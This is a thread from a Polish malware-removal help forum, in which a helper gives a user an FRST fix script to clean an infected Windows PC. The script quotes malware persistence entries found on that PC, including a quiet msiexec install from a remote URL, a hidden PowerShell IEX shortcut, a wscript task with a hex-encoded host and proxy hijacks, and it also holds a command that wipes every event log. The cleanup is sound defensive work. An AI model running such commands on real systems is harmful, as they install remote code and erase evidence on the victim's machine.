Skocz do zawartości

Brak połączenia z internetem


bartek1877

Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
Cytat

Ostatecznie moge wgrac system

Domyślam się, że z powodu braku odpowiedzi już to zrobiłeś (niestety Moderator znów od kilku dni jest niedostępny)

 

Jeśli jednak jeszcze nie sformatowałeś dysku, to:

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.
Otworzy się Notatnik - wklej do niego:

Spoiler

HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\ChromeHTML: -> "C:\Program Files (x86)\Eastness\Application\chrome.exe" "%1" <==== UWAGA
RemoveDirectory: C:\Program Files (x86)\Eastness
RemoveDirectory: C:\ProgramData\3B1FB597
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Program Files (x86)\MIO
RemoveDirectory: C:\Users\user\AppData\Local\NPASRE
RemoveDirectory: C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9}
RemoveDirectory: C:\Users\user\AppData\Local\SNAREA
RemoveDirectory: C:\ProgramData\smQWqI6f.492
ProxyEnable: [S-1-5-19] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-19] => 127.0.0.1:8080
ProxyEnable: [S-1-5-20] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-20] => 127.0.0.1:8080
ProxyEnable: [S-1-5-21-1515640166-2867340543-1920175967-1000] => Proxy [funkcja włączona]
ProxyServer: [S-1-5-21-1515640166-2867340543-1920175967-1000] => 127.0.0.1:8080
ManualProxies: 1127.0.0.1:8080
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1SMdQWFUM1OTNSMdk8MTJSNkI1FdRWFUVWMWNWF8E8MH== /q <==== UWAGA
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger]
Task: {ADAF04DB-C932-40AC-8AE6-D7F35E4F97F1} - System32\Tasks\{10AADE66-C534-454D-A03C-063B83E53749} => C:\Windows\system32\pcalua.exe -a "C:\Users\user\Downloads\Windows Media Player 11 [1].exe" -d C:\Users\user\Downloads
Task: {BFD671CA-1D53-4AF1-A286-130BB21765C0} - System32\Tasks\Chromium lerim => "wscript.exe" "C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9}\dema.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d443431342d3039373734453536383242397d5c6d616e696e69" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d (dane wartości zawierają 84 znaków więcej). <==== UWAGA
Task: {DD3FAE7F-7209-4D6C-8E39-EE0BBBC1232F} - System32\Tasks\{6D3767A9-9E41-441F-B89A-DAB6E5E93AB4} => C:\Windows\system32\pcalua.exe -a C:\Users\user\Downloads\wmp11-windowsxp-x86-PL-PL.exe -d C:\Users\user\Downloads
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-1515640166-2867340543-1920175967-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\program files (x86)\mcafee\SITEAD~1\x64\mcieplg.dll => Brak pliku
CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=54320939c4d150bfeed4b3cg7zct2weqag0c7ofedc&q={searchTerms}
CHR DefaultSearchKeyword: Default -> mystarting123
CHR Extension: (tTab) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oonbcpdabjcggcklopgbdagbfnkhbgbe [2019-03-28]
CHR HKLM\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx
R2 3B1FB597; C:\ProgramData\3B1FB597\DCB5EEC9.dll [617984 2019-03-25] () [Brak podpisu cyfrowego]
S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA
S4 SNAREA; C:\Users\user\AppData\Local\SNAREA\Snare.dll [826368 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA
R2 TermService; C:\ProgramData\smQWqI6f.492\cR8rpo62.58U.dll [115712 2019-03-28] () [Brak podpisu cyfrowego]
S2 avast; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /svc [X]
S3 avastm; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /medsvc [X]
S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X]
U3 aswbdisk; Brak ImagePath
U3 avgbdisk; Brak ImagePath
S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA
S3 mfesapsn; \??\C:\Program Files\McAfee\WebAdvisor\mfesapsn.sys [X]
C:\Users\user\AppData\Roaming\CCBcXkRw.dll
C:\Users\user\AppData\Roaming\CvJLtdsf.dll
C:\Windows\Minidump\041619-13197-01.dmp
HOSTS:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
FirewallRules: [{6EB533DD-505C-4674-87CC-541A6EDD4361}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe Brak pliku
FirewallRules: [{E8CB4767-8CF2-43DA-A040-0F95301812D2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe Brak pliku
FirewallRules: [{28D40CD0-7BB2-49D0-BB54-E6CCFE2A9FCD}] => (Allow) C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe Brak pliku
FirewallRules: [{438BE1C4-80B2-4563-9305-9096CFD5F9D2}] => (Allow) C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe Brak pliku
FirewallRules: [{0F4D9CC7-1A88-43DB-A5EA-AC6A1C6AF31F}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abf050_y45ew40qtxxy45ew40qt.dat () [Brak podpisu cyfrowego]
FirewallRules: [{23F45A2C-324E-4CF7-96B6-BC67BEC868F7}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abf050_y45ew40qtxxy45ew40qt.dat () [Brak podpisu cyfrowego]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software s.r.o. -> AVAST Software) <==== UWAGA
ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe =>   -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\mssccfile' -Name t;IEX $t.t;
C:\Users\user\AppData\Local\RPNLJHFDBz
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S.
W FRST kliknij na Fix (NAPRAW).

 

jessi

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...